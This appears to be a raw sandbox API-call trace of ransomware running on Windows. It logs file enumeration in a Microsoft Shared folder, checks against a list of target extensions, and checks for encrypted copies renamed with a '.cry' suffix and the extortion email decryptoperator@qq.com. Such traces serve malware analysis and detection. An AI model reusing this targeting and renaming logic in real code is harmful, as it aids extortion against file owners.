[0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".doc") returned 4 [0038.618] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".docx") returned 5 [0038.618] lstrcmpiW (lpString1=".docx", lpString2="n.avi") returned -1 [0038.618] lstrlenW (lpString=".pdf") returned 4 [0038.618] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".xls") returned 4 [0038.618] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".xlsx") returned 5 [0038.618] lstrcmpiW (lpString1=".xlsx", lpString2="n.avi") returned -1 [0038.618] lstrlenW (lpString=".ppt") returned 4 [0038.618] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".zip") returned 4 [0038.618] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".rar") returned 4 [0038.618] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".bz2") returned 4 [0038.618] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.618] lstrlenW (lpString=".7z") returned 3 [0038.618] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.618] lstrlenW (lpString=".dbf") returned 4 [0038.618] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.619] lstrlenW (lpString=".1cd") returned 4 [0038.619] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\boxed-join.avi") returned 71 [0038.619] lstrlenW (lpString=".jpg") returned 4 [0038.619] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.619] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0038.619] lstrlenW (lpString="correct.avi") returned 11 [0038.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0038.619] GetFileSizeEx (in: hFile=0x1a0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=197120) returned 1 [0038.619] CloseHandle (hObject=0x1a0) returned 1 [0038.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi")) returned 0x20 [0038.619] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\correct.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.619] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.619] lstrlenW (lpString=".doc") returned 4 [0038.619] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.619] lstrlenW (lpString=".docx") returned 5 [0038.619] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.620] lstrlenW (lpString=".pdf") returned 4 [0038.620] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".xls") returned 4 [0038.620] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".xlsx") returned 5 [0038.620] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.620] lstrlenW (lpString=".ppt") returned 4 [0038.620] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString=".zip") returned 4 [0038.620] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".rar") returned 4 [0038.620] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".bz2") returned 4 [0038.620] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".7z") returned 3 [0038.620] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString=".dbf") returned 4 [0038.620] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString=".1cd") returned 4 [0038.620] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString=".jpg") returned 4 [0038.620] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.620] lstrlenW (lpString=".doc") returned 4 [0038.620] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".docx") returned 5 [0038.620] lstrcmpiW (lpString1=".docx", lpString2="t.avi") returned -1 [0038.620] lstrlenW (lpString=".pdf") returned 4 [0038.620] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".xls") returned 4 [0038.620] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.620] lstrlenW (lpString=".xlsx") returned 5 [0038.621] lstrcmpiW (lpString1=".xlsx", lpString2="t.avi") returned -1 [0038.621] lstrlenW (lpString=".ppt") returned 4 [0038.621] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.621] lstrlenW (lpString=".zip") returned 4 [0038.621] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.621] lstrlenW (lpString=".rar") returned 4 [0038.621] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.621] lstrlenW (lpString=".bz2") returned 4 [0038.621] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.621] lstrlenW (lpString=".7z") returned 3 [0038.621] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.621] lstrlenW (lpString=".dbf") returned 4 [0038.621] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.621] lstrlenW (lpString=".1cd") returned 4 [0038.621] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.621] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\correct.avi") returned 68 [0038.621] lstrlenW (lpString=".jpg") returned 4 [0038.621] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.621] lstrcmpiW (lpString1=".avi", lpString2=".cry") returned -1 [0038.621] lstrlenW (lpString="delete.avi") returned 10 [0038.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x188 [0038.803] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=224256) returned 1 [0038.803] CloseHandle (hObject=0x188) returned 1 [0038.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi")) returned 0x20 [0038.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0038.803] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\delete.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString=".doc") returned 4 [0038.804] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".docx") returned 5 [0038.804] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0038.804] lstrlenW (lpString=".pdf") returned 4 [0038.804] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".xls") returned 4 [0038.804] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".xlsx") returned 5 [0038.804] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0038.804] lstrlenW (lpString=".ppt") returned 4 [0038.804] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString=".zip") returned 4 [0038.804] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".rar") returned 4 [0038.804] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".bz2") returned 4 [0038.804] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString=".7z") returned 3 [0038.804] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString=".dbf") returned 4 [0038.804] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString=".1cd") returned 4 [0038.804] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.804] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.804] lstrlenW (lpString=".jpg") returned 4 [0038.805] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.805] lstrlenW (lpString=".doc") returned 4 [0038.805] lstrcmpiW (lpString1=".doc", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".docx") returned 5 [0038.805] lstrcmpiW (lpString1=".docx", lpString2="e.avi") returned -1 [0038.805] lstrlenW (lpString=".pdf") returned 4 [0038.805] lstrcmpiW (lpString1=".pdf", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".xls") returned 4 [0038.805] lstrcmpiW (lpString1=".xls", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".xlsx") returned 5 [0038.805] lstrcmpiW (lpString1=".xlsx", lpString2="e.avi") returned -1 [0038.805] lstrlenW (lpString=".ppt") returned 4 [0038.805] lstrcmpiW (lpString1=".ppt", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.805] lstrlenW (lpString=".zip") returned 4 [0038.805] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".rar") returned 4 [0038.805] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".bz2") returned 4 [0038.805] lstrcmpiW (lpString1=".bz2", lpString2=".avi") returned 1 [0038.805] lstrlenW (lpString=".7z") returned 3 [0038.806] lstrcmpiW (lpString1=".7z", lpString2="avi") returned -1 [0038.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.806] lstrlenW (lpString=".dbf") returned 4 [0038.806] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0038.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.806] lstrlenW (lpString=".1cd") returned 4 [0038.806] lstrcmpiW (lpString1=".1cd", lpString2=".avi") returned -1 [0038.806] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\delete.avi") returned 67 [0038.806] lstrlenW (lpString=".jpg") returned 4 [0038.806] lstrcmpiW (lpString1=".jpg", lpString2=".avi") returned 1 [0038.806] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0038.806] lstrlenW (lpString="oskpredbase.xml") returned 15 [0038.806] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.321] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=924) returned 1 [0039.321] CloseHandle (hObject=0x184) returned 1 [0039.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0x20 [0039.321] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.321] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.321] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.321] lstrlenW (lpString=".doc") returned 4 [0039.321] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.321] lstrlenW (lpString=".docx") returned 5 [0039.321] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0039.321] lstrlenW (lpString=".pdf") returned 4 [0039.321] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.321] lstrlenW (lpString=".xls") returned 4 [0039.321] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".xlsx") returned 5 [0039.322] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0039.322] lstrlenW (lpString=".ppt") returned 4 [0039.322] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString=".zip") returned 4 [0039.322] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.322] lstrlenW (lpString=".rar") returned 4 [0039.322] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".bz2") returned 4 [0039.322] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".7z") returned 3 [0039.322] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString=".dbf") returned 4 [0039.322] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString=".1cd") returned 4 [0039.322] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString=".jpg") returned 4 [0039.322] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.322] lstrlenW (lpString=".doc") returned 4 [0039.322] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".docx") returned 5 [0039.322] lstrcmpiW (lpString1=".docx", lpString2="e.xml") returned -1 [0039.322] lstrlenW (lpString=".pdf") returned 4 [0039.322] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".xls") returned 4 [0039.322] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.322] lstrlenW (lpString=".xlsx") returned 5 [0039.323] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0039.323] lstrlenW (lpString=".ppt") returned 4 [0039.323] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.323] lstrlenW (lpString=".zip") returned 4 [0039.323] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.323] lstrlenW (lpString=".rar") returned 4 [0039.323] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.323] lstrlenW (lpString=".bz2") returned 4 [0039.323] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.323] lstrlenW (lpString=".7z") returned 3 [0039.323] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.323] lstrlenW (lpString=".dbf") returned 4 [0039.323] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.323] lstrlenW (lpString=".1cd") returned 4 [0039.323] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.323] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0039.323] lstrlenW (lpString=".jpg") returned 4 [0039.323] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.323] lstrcmpiW (lpString1=".xml", lpString2=".cry") returned 1 [0039.323] lstrlenW (lpString="ja-jp-sym.xml") returned 13 [0039.323] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0039.390] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=749) returned 1 [0039.390] CloseHandle (hObject=0x184) returned 1 [0039.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0x20 [0039.390] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0039.391] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0039.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.391] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.391] lstrlenW (lpString=".doc") returned 4 [0039.391] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.391] lstrlenW (lpString=".docx") returned 5 [0039.391] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0039.391] lstrlenW (lpString=".pdf") returned 4 [0039.391] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.391] lstrlenW (lpString=".xls") returned 4 [0039.391] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.391] lstrlenW (lpString=".xlsx") returned 5 [0039.391] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0039.391] lstrlenW (lpString=".ppt") returned 4 [0039.392] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString=".zip") returned 4 [0039.392] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.392] lstrlenW (lpString=".rar") returned 4 [0039.392] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString=".bz2") returned 4 [0039.392] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString=".7z") returned 3 [0039.392] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString=".dbf") returned 4 [0039.392] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString=".1cd") returned 4 [0039.392] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString=".jpg") returned 4 [0039.392] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.392] lstrlenW (lpString=".doc") returned 4 [0039.392] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0039.392] lstrlenW (lpString=".docx") returned 5 [0039.392] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0039.393] lstrlenW (lpString=".pdf") returned 4 [0039.393] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0039.393] lstrlenW (lpString=".xls") returned 4 [0039.393] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0039.393] lstrlenW (lpString=".xlsx") returned 5 [0039.393] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0039.393] lstrlenW (lpString=".ppt") returned 4 [0039.393] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0039.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.393] lstrlenW (lpString=".zip") returned 4 [0039.393] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0039.393] lstrlenW (lpString=".rar") returned 4 [0039.393] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0039.393] lstrlenW (lpString=".bz2") returned 4 [0039.393] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0039.393] lstrlenW (lpString=".7z") returned 3 [0039.393] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0039.393] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.393] lstrlenW (lpString=".dbf") returned 4 [0039.394] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0039.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.394] lstrlenW (lpString=".1cd") returned 4 [0039.394] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0039.394] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml") returned 86 [0039.394] lstrlenW (lpString=".jpg") returned 4 [0039.394] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0039.394] lstrcmpiW (lpString1=".xml", 